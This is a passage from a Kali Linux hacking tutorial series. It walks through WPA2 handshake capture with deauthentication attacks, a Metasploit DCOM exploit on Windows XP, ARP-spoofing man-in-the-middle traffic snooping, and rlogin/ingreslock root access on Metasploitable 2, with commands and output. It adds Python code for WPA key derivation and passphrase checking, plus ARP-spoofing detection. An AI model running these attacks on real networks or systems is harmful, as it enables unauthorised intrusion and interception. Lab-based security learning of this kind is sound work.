is used to establish another key called the PTK (Pairwise Transient Key). The PTK is
generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA
nonce (SNonce), AP MAC address, and STA MAC address. The product is then put
through PBKDF2-SHA1 as the cryptographic hash function.
The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast
and broadcast traffic. The actual messages exchanged during the handshake are
depicted in the figure and explained below:
1. The AP sends a nonce-value to the STA (ANonce). The client now has all the
attributes to construct the PTK.
2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC,
including authentication, which is really a Message Authentication and
Integrity Code: (MAIC).
3. The AP sends the GTK and a sequence number together with another MIC.
This sequence number will be used in the next multicast or broadcast frame, so
that the receiving STA can perform basic replay detection.
4. The STA sends a confirmation to the AP.
All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key – 64 bytes)
1. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on
WPA EAPOL Key message
2. 16 bytes of EAPOL-Key Encryption Key (KEK) - AP uses this key to encrypt
additional data sent (in the 'Key Data' field) to the client (for example, the RSN
IE or the GTK)
3. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets
4. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on
unicast data packets transmitted by the AP
5. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on
unicast data packets transmitted by the station
The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used
if the network is using TKIP to encrypt the data.
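The derivation above, carried through as an added example (not code from the lesson or from the aircrack-ng suite): the PMK comes from the passphrase and SSID via PBKDF2-HMAC-SHA1, the PTK from the PMK, both MACs and both nonces via the HMAC-SHA1 PRF of IEEE 802.11i, followed by the key split listed above and the EAPOL-Key MIC computed with the KCK. The MAC addresses, nonces and message-2 frame are constructed; the passphrase/SSID pair "password"/"IEEE" is the published 802.11i test vector.

```python
import hashlib
import hmac

# Added example. All MACs, nonces and the EAPOL-Key frame here are constructed.
EAPOL_MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of Key Descriptor fields before Key MIC
EAPOL_MIC_LEN = 16


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_sha1(key: bytes, label: bytes, data: bytes, out_len: int) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ...; truncate."""
    out = b""
    i = 0
    while len(out) < out_len:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:out_len]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs then min/max of the nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_sha1(pmk, b"Pairwise key expansion", data, 64)


def split_ptk(ptk: bytes) -> dict:
    """The five pieces listed in the text (the last two are only used with TKIP)."""
    return {
        "KCK": ptk[0:16],      # EAPOL-Key Confirmation Key: MIC over handshake messages
        "KEK": ptk[16:32],     # EAPOL-Key Encryption Key: wraps the Key Data field (e.g. GTK)
        "TK": ptk[32:48],      # Temporal Key: unicast data encryption
        "MIC_TX": ptk[48:56],  # Michael MIC keys, TKIP only
        "MIC_RX": ptk[56:64],
    }


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key Descriptor Version 2 (WPA2): HMAC-SHA1 over the frame with the MIC field zeroed, first 16 bytes."""
    zeroed = frame[:EAPOL_MIC_OFFSET] + b"\x00" * EAPOL_MIC_LEN + frame[EAPOL_MIC_OFFSET + EAPOL_MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:EAPOL_MIC_LEN]


def build_message2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (station -> AP) with an empty MIC and no Key Data."""
    body = (b"\x02"            # Key Descriptor Type: RSN
            + b"\x01\x0a"      # Key Information: MIC bit set, pairwise, descriptor version 2
            + b"\x00\x10"      # Key Length
            + b"\x00" * 8      # Replay Counter
            + snonce           # Key Nonce
            + b"\x00" * 16     # Key IV
            + b"\x00" * 8      # Key RSC
            + b"\x00" * 8      # Key ID (reserved)
            + b"\x00" * 16     # Key MIC, filled in by sign_frame()
            + b"\x00\x00")     # Key Data Length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 1, type 3 (Key)


def sign_frame(kck: bytes, frame: bytes) -> bytes:
    """Return the frame with its MIC field filled in, as the station would send it."""
    return frame[:EAPOL_MIC_OFFSET] + eapol_mic(kck, frame) + frame[EAPOL_MIC_OFFSET + EAPOL_MIC_LEN:]


def verify_handshake(passphrase, ssid, aa, spa, anonce, snonce, frame) -> bool:
    """True if the candidate passphrase reproduces the MIC carried in message 2.

    Everything else in this computation is visible in a capture, which is why
    the passphrase's entropy is the only bound on offline guessing.
    """
    kck = split_ptk(derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce))["KCK"]
    return hmac.compare_digest(eapol_mic(kck, frame), frame[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + EAPOL_MIC_LEN])


# Constructed sample values (hypothetical MACs and nonces, not from a capture).
AP_MAC = bytes.fromhex("020000000001")
STA_MAC = bytes.fromhex("020000000002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))

if __name__ == "__main__":
    pmk = derive_pmk("password", "IEEE")   # 802.11i Annex H test vector
    keys = split_ptk(derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE))
    msg2 = sign_frame(keys["KCK"], build_message2(SNONCE))
    print("PMK:", pmk.hex())
    print("KCK:", keys["KCK"].hex(), "TK:", keys["TK"].hex())
    print("right passphrase:", verify_handshake("password", "IEEE", AP_MAC, STA_MAC, ANONCE, SNONCE, msg2))
    print("wrong passphrase:", verify_handshake("Password", "IEEE", AP_MAC, STA_MAC, ANONCE, SNONCE, msg2))
```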
By the way, if you didn't understand much of it then don't worry. There's a reason
why people don't search for hacking tutorials on Wikipedia (half the stuff goes above
the head)
Capturing The Handshake
Now there are several (only 2 listed here) ways of capturing the handshake. We'll look
at them one by one:
1. Wifite (easy and automatic)
2. Airodump-ng (easy but not automatic, you manually have to do what wifite did
on its own)
Wifite
Methodology
We'll go with the easy one first. Now you need to realize that for a handshake to be
captured, there needs to be a handshake. Now there are 2 options: you could either sit
there and wait till a new client shows up and connects to the WPA network, or you
can force the already connected clients to disconnect, and when they connect back,
you capture their handshake. Now while other tutorials don't mention this, I will (such
a good guy I am :) ). Your network card is good at receiving packets, but not as good
at creating them. Now if your clients are very far from you, your deauth requests (i.e.
"please get off this connection" requests) won't reach them, and you'll keep wondering
why you aren't getting any handshake (the same kind of problem is faced during ARP
injection and other kinds of attacks too). So, the idea is to be as close to the access
point (router) and the clients as possible. Now the methodology is the same for the wifite and
airodump-ng methods, but wifite does all this crap for you, and in the case of airodump-ng,
you'll have to call a brethren (aireplay-ng) to your rescue. Okay, enough theory.
Get the handshake with wifite
Now my configuration here is quite simple. I have my cellphone creating a wireless
network named 'me' protected with wpa-2. Now currently no one is connected to the
network. Lets try and see what wifite can do.
root@kali:~# wifite
WiFite v2 (r85) - automated wireless auditor - designed for Linux
[+] scanning for wireless devices...
[+] enabling monitor mode on wlan0... done
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
[0:00:04] scanning wireless networks. 0 targets and 0 clients found
[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
--- --------------------  --  ----  -----  ----  ------
 1  me                     1  WPA2  57db   wps
 2  *******               11  WEP   21db   no    client
 3  **************        11  WEP   21db   no
Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked
me which target to attack. (The network has WPS enabled. This is an added bonus;
reaver can save you from all the trouble. Also, wifite will use reaver too to skip the
whole WPA cracking process and use a WPS flaw instead. In this tutorial we'll forget
that this network has WPS and capture the handshake instead.)
[+] select target numbers (1-3) separated by commas, or 'all':
Now I selected the first target, i.e. me. As expected, it had two attacks in store for us.
First it tried the PIN guessing attack. It has almost 100% success rate, and would have
given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to
capture the handshake. I waited for 10-20 secs, and then pressed ctrl+c. No client was
there so no handshake could be captured. Here's what happened.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:08:05] listening for handshake...
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] disabling monitor mode on mon0... done
[+] quitting
Now I connected my other PC to 'me'. Lets do it again. This time a client will show
up, and wifite will de-authenticate it, and it'll try to connect again. Lets see what
happens this time around.
NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
--- --------------------  --  ----  -----  ----  ------
 1  *                      1  WPA   99db   no    client
 2  me                     1  WPA2  47db   wps   client
 3  *                     11  WEP   22db   no    clients
 4  *                     11  WEP   20db   no
[+] select target numbers (1-4) separated by commas, or 'all': 2
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:07:51] listening for handshake...
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] quitting
Now the deauth attacks weren't working. This time I increased the deauth frequency.
root@kali:~# wifite -wpadt 1
Soon, however, I realized, that the problem was that I was using my internal card
(Kali Live USB). It does not support packet injection, so deauth wasn't working. So
time to bring my external card to the scene.
root@kali:~# wifite
WiFite v2 (r85) - automated wireless auditor - designed for Linux
[+] scanning for wireless devices...
[+] available wireless devices:
  1. wlan1   Ralink RT2870/3070   rt2800usb - [phy1]
  2. wlan0   Atheros              ath9k - [phy0]
[+] select number of device to put into monitor mode (1-2):
See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output
NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
--- --------------------  --  ----  -----  ----  ------
 1  me                     1  WPA2  44db   wps   client
 2  *                     11  WEP   16db   no    client
 3  *                     11  WEP   16db   no
[+] select target numbers (1-3) separated by commas, or 'all':
Now I attack the target. This time, finally, I captured a handshake.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:07:23] listening for handshake...
[0:00:57] handshake captured! saved as "hs/me_02-73-8D-**-**-**.cap"
[+] 2 attacks completed:
[+] 1/2 WPA attacks succeeded
me (02:73:8D:37:A7:ED) handshake captured
saved as hs/me_02-73-8D-**-**-**.cap
[+] starting WPA cracker on 1 handshake
[!] no WPA dictionary found! use -dict <file> command-line argument
[+] disabling monitor mode on mon0... done
[+] quitting
As you can see, it took me 57 seconds to capture the handshake (5 deauth requests
were sent; one every 10 secs is the default). The no dictionary error shouldn't bother you.
We'll use Wifite only to capture the handshake. Now the captured handshake was
saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after
converting to .hccap), etc. using either a wordlist or brute force. Let's see how to do the
same thing with airodump-ng. This time I won't show you the problems you might run
into. It'll be a perfect ride; all the problems were seen in the wifite case.
Capturing Handshake with Airodump-ng
Now if you skipped everything and got right here, then you are missing a lot of things.
I'll end this pretty quick, as the wifite thing was quite detailed. I'm copying stuff
from http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html where I already
discussed airodump-ng. (If you are not a newbie, skip to the point where you see red
text)
1. Find out the name of your wireless adapter.
Alright, now, your computer has many network adapters, so to scan one, you need to
know its name. So there are basically the following things that you need to know:
lo - loopback. Not important currently.
eth - ethernet
wlan - This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the
wlan(0/1/2) adapter.
Trouble with the wlan interface not showing up. This is because virtual machines can't
use internal wireless cards and you will have to use external cards. You should try
booting Kali using Live USB (just look at the first part of this tutorial), or buy an
external card.
2. Enable Monitor mode
Now, we use a tool called airmon-ng to create a virtual interface called mon. Just type
airmon-ng start wlan0
Your mon0 interface will be created.
3. Start capturing packets
Now, we'll use airodump-ng to capture the packets in the
air. This tool gathers data from the wireless packets in
the air. You'll see the name of the wifi you want to
hack.
airodump-ng mon0
4. Store the captured packets in a file
This can be achieved by giving some more parameters with
the airodump command
airodump-ng mon0 --write name_of_file
Non newbies:
root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere
Now copy the bssid field of your target network (from the airodump-ng screen) and
launch a deauth attack with aireplay-ng
root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0
The --deauth tells aireplay to launch a deauth attack. 0 tells it to fire at an interval of 0
secs (very fast, so run it only for a few secs and press ctrl+c). -a requires the BSSID;
replace "BSSID here" with your target BSSID. mon0 is the interface you created.
In case you face problems with the monitor mode hopping from one channel to
another, or problems with the beacon frame, then fix mon0 on a channel using
root@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is. You might also need to add
--ignore-negative-one if aireplay demands it. In my case airodump-ng says fixed
channel mon0: -1 so this was required. (It's a bug with the aircrack-ng suite).
Now when you look at the airodump-ng screen, you'll see that at the top right it says
WPA handshake captured . Here is what it looks like
CH 1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
02:73:8D:37:A7:ED  -47  75      201       35    0   1  54e  WPA2 CCMP   PSK  me
BSSID              STATION            PWR   Rate    Lost    Frames  Probe
*                  *                    0   0e- 1    742        82  me
*                  *                  -35   0e- 1      0        26
You can confirm it by typing the following
root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
   #  BSSID              ESSID                     Encryption
   1  **************     me                        WPA (1 handshake)
   2  **                                           Unknown
Happy cracking, all that needs to be done in this tutorial has been done. It's been a
long one. Hope it helped you.
Lesson 20: Hacking Windows XP
Penetration Testing - Hacking XP
Our approach to penetration testing is going to be simple. I already made a post about
the ideal way to begin penetration testing. But we aren't going the ideal way. I'm gonna
teach you penetration testing the way I learnt it: by doing actual penetration and
exploitation. We can't hack a completely patched Windows 7 or Windows 8, right, but
we can definitely hack an unpatched Windows XP machine. However, to do that, you
need a victim machine. Testing this method on someone else's computer is not
recommended and is quite illegal. It is strongly advised to create your own virtual
machine and test exploits there.
Virtual Machines
Windows XP (installing XP on a VM will be a piece of cake; a few screenshots of the
process)
A look at Metasploit Framework
Starting the framework
"In keeping with the Kali Linux Network Services Policy, there are no network
services, including database services, running on boot so there are a couple of steps
that need to be taken in order to get Metasploit up and running with database support."
Simply speaking, there are some services that metasploit needs which aren't started
at system startup. So here are some commands you need to execute on your console
before you can start metasploit:
service postgresql start
(Metasploit uses PostgreSQL as its database so it needs to be launched first.)
With PostgreSQL up and running, we next need to launch the metasploit service. The
first time the service is launched, it will create a msf3 database user and a database
called msf3. The service will also launch the Metasploit RPC and Web servers it
requires.
service metasploit start
Now finally we are ready to start metasploit framework.
msfconsole
Looking at the targets
Right now, my metasploit framework is running on Kali on VMware on a Windows 8
machine. Also, there is a Windows XP SP3 virtual machine running side by side with
my Kali. So what we need to do is detect these machines in the Metasploit framework.
For this we'll do a port scan.
Port Scan
Metasploit offers an awesome port scanning function which goes by the name
auxiliary scanner. Here is the command to execute this scan
To use this feature, enter the following code
use auxiliary/scanner/portscan/tcp
Type show options to see the available options
show options
Now we have to change a few settings, firstly, we should reduce the number of ports
scanned
set ports 1-500
Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is
not going to be the same in all cases. So here's what you'll do. Go to your XP virtual
machine (the one you are trying to hack). Open command prompt and type
ipconfig
In the results, check the IP of the machine. This is what you'll have to specify the
RHOSTS option as.
In my case the IP is 192.168.63.131
Now go back to your Kali machine, and type the following (change the IP as required)
set RHOST 192.168.63.131
Here's what it should look like
There's a slight error here, I spelled RHOSTS wrong. Make sure you add the 's' in the end.
Now we are ready for some action; do a show options again to see what all changes
you've made. Finally, type
run
The scan will start and after some time it will show you which tcp ports are open and
vulnerable to attack.
If you had not been using an unpatched version of Windows, there will not be any
vulnerable ports.
This basically means that there are no open ports here. Nothing much you can do.
However if you had some good luck there, and had a vulnerable machine, you will
have some vulnerable ports. In my case, I turned off the firewall on the Windows
machine and ran the auxiliary module again.
I got 3 open ports this time. If you are using some higher XP version, you too might
need to disable the firewall in order to get open ports.
Now we know we have a target at IP 192.168.63.131 and it has ports 135, 139 and 445
open.
Real life port scan
In actual pentesting environment, you don't know about the IP, open ports and OS of
the target computer. In such cases, we can use Nmap port scanner which is much
better than auxiliary. We'll come to that later.
Finding Exploits
This step is important. We need to figure out which exploits work on the OS we are
attacking. In our case, we already know what to do. Type back to get out of auxiliary
scanner. Search for dcom on msfconsole.
search dcom
This is a very famous exploit for Windows.
Copy the exploit number 3. (Which shows great as rank). In the next line, type
use exploit/windows/dcerpc/ms03_026_dcom
You are now using the most famous Windows exploit. Type show options again
show options
Again, set the RHOST as 192.168.63.131 (replace with the IP of your target)
set RHOST 192.168.63.131
Also, set a payload.
set PAYLOAD windows/shell_bind_tcp
And here's the best part
exploit
You have now successfully broken into the target computer. You have an open shell
on the target computer with administrator privileges. In short, you own that computer
now. Try out what all you can do from here on. I'll come up with more in the next
tutorial.
We have a pentesting lab now and have successfully exploited an XP machine.
Lesson 21: Metasploitable 2
Metasploitable 2 Linux - Most Vulnerable OS in
the town : Introduction and Installation
What is Metasploitable 2
The Metasploitable virtual machine is an
intentionally vulnerable version of Ubuntu Linux designed for testing security tools
and demonstrating common vulnerabilities. Version 2 of this virtual machine is
available for download and ships with even more vulnerabilities than the original
image. This virtual machine is compatible with VMWare, VirtualBox, and other
common virtualization platforms. By default, Metasploitable's network interfaces are
bound to the NAT and Host-only network adapters, and the image should never be
exposed to a hostile network. [Quoted from Rapid7]
Download and install metasploitable linux
Firstly, I'd list some requirements- 10 to 30 GB disk space for metasploitable (Kali
would need a similar amount of disk space), 1GB ram for metasploitable (a total of
4GB would be great, 1gb for kali, 1gb for metasploit, and 2gb will keep your host OS
running). If you have all this, which you probably should, then go ahead and
download Metasploitable from sourceforge.
- http://sourceforge.net/projects/metasploitable/
The last time I checked, the download was a zip file.
After extracting it, no installation is needed. What IS needed is a virtual machine
software like Vmware or virtualbox. You can use Virtual Box, which is free, or
VmWare workstation, which you'll have to buy, Vmware player is free, and will serve
most of your purposes. I am using Vmware Workstation, and will give the instructions
for it. Detailed guides are available for all of these on the internet, and I won't waste
much time with it. Assuming you have downloaded and extracted the Metasploitable
file, and installed Vmware Workstation, follow these instructions:
Open Vmware workstation. Click on file -> Open. Something like this will pop out.
After that browse to the location where you extracted the Metasploitable file. It must
look somewhat like this. Click on open. You will see something with Vmware icon.
Open that one.
Your virtual machine will be up and running within a few minutes. Depending on the
situation, a few more 'next' and 'enter' steps would be required, but the instructions
provided by the program would be simple and clear and you can help yourself.
Once you've started Metasploitable
You'll have a login prompt, and the login username and password would be given
right there. It would be msfadmin, if you can't seem to find it. Nothing else needs to
be done here. Now your target is ready, but you are far from done. If this is not your
first visit to this blog, then you have probably already installed Kali Linux and know how
to use it. If you have been following this blog for a long time, then you also know how
to use Metasploit to hack Windows machines, and are ready to jump to the next post.
So if you have the OS and the basic hacking skills, then you can stop here and move to
the next post (coming soon). If not, follow along.
Kali Linux and metasploit
While it's not necessary to use Kali Linux, and Backtrack, Backbox Linux and other
Linux distributions will work well too, there is no reason why NOT to use Kali Linux.
It simplifies everything for you, providing you with 100s of tools pre-installed, and is
specifically designed for pentesting. It has some advantages over Backtrack; most
importantly, it has been written from scratch in Debian and has resolved most of the
Backtrack issues. It comes preinstalled with Metasploit, so that takes out one step.
Lesson 22: Man In The Middle Attack
Today our tutorial will talk about the Kali Linux Man in the Middle Attack: how to perform a man in the
middle attack using Kali Linux. We will learn the step by step process of how to do this.
I believe most of you already know about the concept of what a man in the middle attack is, but
if you still don't know about this, here is a definition from wikipedia.
The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography
and computer security is a form of active eavesdropping in which the attacker makes independent
connections with the victims and relays messages between them, making them believe that they are
talking directly to each other over a private connection, when in fact the entire conversation is
controlled by the attacker.
Victim IP address : 192.168.8.90
Attacker network interface : eth0; with IP address : 192.168.8.93
Router IP address : 192.168.8.8
Requirements:
1. Arpspoof
2. Driftnet
3. Urlsnarf
Step by step Kali Linux Man in the Middle Attack :
1. Open your terminal (CTRL + ALT + T kali shortcut) and configure our Kali Linux machine to allow
packet forwarding, because to act as the man in the middle attacker, Kali Linux must act as a router between
the "real router" and the victim. Read the tutorial here on how to set up packet forwarding in linux.
2. You can change your terminal interface to make the view much more friendly and easy to monitor
by splitting kali linux terminal window.
3. The next step is setting up arpspoof between victim and router.
arpspoof -i eth0 -t 192.168.8.90 192.168.8.8
4. And then set up arpspoof to capture all packets from the router to the victim.
arpspoof -i eth0 192.168.8.8 192.168.8.90
5. After steps three and four, all the packets sent or received by the victim should now be going through
the attacker machine.
6. Now we can try to use driftnet to monitor all the victim's image traffic. According to its website,
Driftnet is a program which listens to network traffic and picks out images from TCP streams it
observes. Fun to run on a host which sees lots of web traffic.
7. To run driftnet, we just run this
driftnet -i eth0
When the victim browses a website with images, driftnet will capture all the image traffic.
To stop driftnet, just close the driftnet window or press CTRL + C in the terminal.
8. For the next step we will try to capture the website information/data by using urlsnarf. To use
urlsnarf, just run this command
urlsnarf -i eth0
and urlsnarf will start capturing all the website addresses visited by the victim machine.
9. When the victim browses a website, the attacker will know the address the victim visited.
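Seen from the other side, the two arpspoof commands above leave a recognisable trace in ARP traffic: the gateway's address suddenly answers from a different MAC, and one MAC claims both the router's and the victim's IP. The following is an added example (not part of the lesson) of detection logic run over a constructed tcpdump-style capture that uses the lesson's addresses; the MACs and timestamps are invented.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, Iterator, List, Tuple

# Added example: detection of the ARP cache poisoning described in the steps
# above, over lines in the shape of `tcpdump -tt -n arp` output as seen from
# the victim host (or a SPAN port). The MACs and timestamps are constructed.
ARP_REPLY = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?) ARP, Reply (?P<ip>\d+\.\d+\.\d+\.\d+) "
    r"is-at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
)

SAMPLE_CAPTURE = """\
1402693200.10 ARP, Reply 192.168.8.8 is-at 00:0c:29:aa:aa:aa, length 28
1402693200.50 ARP, Reply 192.168.8.90 is-at 00:0c:29:bb:bb:bb, length 28
1402693201.00 ARP, Request who-has 192.168.8.93 tell 192.168.8.90, length 28
1402693201.20 ARP, Reply 192.168.8.8 is-at 00:0c:29:cc:cc:cc, length 28
1402693201.22 ARP, Reply 192.168.8.90 is-at 00:0c:29:cc:cc:cc, length 28
1402693203.20 ARP, Reply 192.168.8.8 is-at 00:0c:29:cc:cc:cc, length 28
"""


@dataclass(frozen=True)
class Alert:
    ts: float
    kind: str      # "ip-mac-change" or "mac-multi-ip"
    detail: str


def parse_arp_replies(text: str) -> Iterator[Tuple[float, str, str]]:
    """Yield (timestamp, sender IP, sender MAC) per ARP reply; requests and other lines are skipped."""
    for line in text.splitlines():
        m = ARP_REPLY.match(line)
        if m:
            yield float(m["ts"]), m["ip"], m["mac"].lower()


def detect_arp_spoofing(replies: Iterable[Tuple[float, str, str]], gateway: str) -> List[Alert]:
    """Flag the two symptoms the arpspoof pair produces.

    1. An IP (above all the gateway) announced from a MAC other than the one
       seen before.
    2. One MAC announcing more than one IP, which is what happens when the
       attacker claims the router's address to the victim and the victim's
       address to the router.
    Each condition is reported once per new (IP, MAC) pair, so the replies
    arpspoof repeats every couple of seconds do not flood the output.
    """
    ip_to_mac: dict = {}
    mac_to_ips = defaultdict(set)
    alerts: List[Alert] = []
    for ts, ip, mac in replies:
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            label = "gateway " if ip == gateway else ""
            alerts.append(Alert(ts, "ip-mac-change", f"{label}{ip} moved from {previous} to {mac}"))
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(Alert(ts, "mac-multi-ip", f"{mac} now claims {sorted(mac_to_ips[mac])}"))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(parse_arp_replies(SAMPLE_CAPTURE), gateway="192.168.8.8"):
        print(f"{alert.ts:.2f} {alert.kind}: {alert.detail}")
```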
Lesson 23: Metasploitable 2 – Vulnerability
Assessment.
Metasploitable 2 : Vulnerability assessment and
Remote Login
If you've followed my previous tutorial on Introduction to Metasploitable 2, then you
should be sitting here with Kali Linux and Metasploitable 2 up and running. So, I'm
gonna skip the formalities and move right ahead.
Portscan
On a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP
address. This will give you an idea of what the IP of your target machine could be. In
my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that
Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. To
scan all hosts in that range, you can use an Nmap scan. Here is what it should look like.
nmap -sS 192.168.154.0/24
The conclusion that can be drawn here is that the Metasploitable 2 machine has IP
192.168.154.132. Also, it has a large number of open ports. As you will discover later, each
of these ports is a potential gateway into the machine. On the Metasploitable machine,
after logging in with msfadmin:msfadmin, you can execute ifconfig to verify that
the IP is indeed 192.168.154.132 (or whatever it may be in your case).
Vulnerabilities
The Metasploitable 2 operating system has been loaded with a large number of
vulnerabilities. There are the following kinds of vulnerabilities in Metasploitable 2:
1. Misconfigured Services - A lot of services have been misconfigured and
provide direct entry into the operating system.
2. Backdoors - A few programs and services have been backdoored. These
backdoors can be used to gain access to the OS.
3. Weak Passwords - These are vulnerable to brute-force attacks.
4. Vulnerable Web Services - A few web services pre-installed into
Metasploitable have known vulnerabilities which can be exploited.
5. Web Application Vulnerabilities - Some vulnerable web applications can be
exploited to gain entry to the system.
There is a very resourceful article about many of these vulnerabilities on the Rapid7 website.
Exploiting The Vulnerabilities
Remote access vulnerability - Rlogin
Remember the list of open ports which you came across during the port scan? Ports
512, 513 and 514 are there for remotely accessing Unix machines. They have
been misconfigured in such a way that anyone can set up a remote connection without
proper authentication. This vulnerability is easy to exploit. We will use rlogin to
remotely log in to Metasploitable 2. Type rlogin to see the details about the command
structure.
root@kali:~# rlogin
usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]
[-D [bind_address:]port] [-e escape_char] [-F configfile]
[-I pkcs11] [-i identity_file]
[-L [bind_address:]port:host:hostport]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[-R [bind_address:]port:host:hostport] [-S ctl_path]
[-W host:port] [-w local_tun[:remote_tun]]
[user@]hostname [command]
rlogin -l root 192.168.154.132
Most probably you will get something like this:
root@kali:~# rlogin -l root 192.168.154.132
The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established.
RSA key fingerprint is *****.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.154.132' (RSA) to the list of known hosts.
root@192.168.154.132's password:
As you can see, it is asking for a password. It's not because the target is not
vulnerable. It's because we don't have the rsh-client package installed on Kali Linux (without it,
rlogin falls back to ssh, as the usage message above shows). rsh-client is a remote login utility that
allows users to connect to remote machines.
apt-get install rsh-client
This will start the installation process; you'll have to type yes once or twice, and Kali will
do the rest for you. After the installation is successful, try your previous
command again. This time around, things will be better.
root@kali:~# rlogin -l root 192.168.154.132
Last login: Thu May 1 11:34:55 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#
Now you have a root (administrator privilege) shell on Metasploitable 2. That was as easy
as typing one line (and installing an application). We have one more such
vulnerability that can be exploited easily.
Telnet Vulnerability
Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a
popular FTP server. The version that is installed on Metasploitable contains a backdoor.
The backdoor was quickly identified and removed, but not before quite a few people
downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley),
the backdoored version will open a listening shell on port 6200. This means anyone
can log in to the computer without knowing the credentials, just by using :). This can be
exploited using Metasploit. We will cover this in the next tutorial. Till then, something
for your appetite:
telnet 192.168.99.131 1524
This is another one-line exploit, on the 1524 ingreslock port (see the portscan result).
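An added example, not the lesson's own code: a triage script that parses Nmap normal output (a constructed sample of the scan above, with only a few of the open ports) and flags the ports this lesson discusses, so an asset owner can see at a glance which services should be shut down or replaced.

```python
import re

# Matches the "port/proto  state  service" lines of Nmap normal output.
PORT_LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)", re.M)

# Findings for the ports named in this lesson, written from the defender's side.
KNOWN_RISKY = {
    21:   "ftp: the vsftpd build on Metasploitable 2 contains a backdoor; upgrade or remove",
    512:  "exec (rexec): legacy r-service, clear-text and weakly authenticated; disable",
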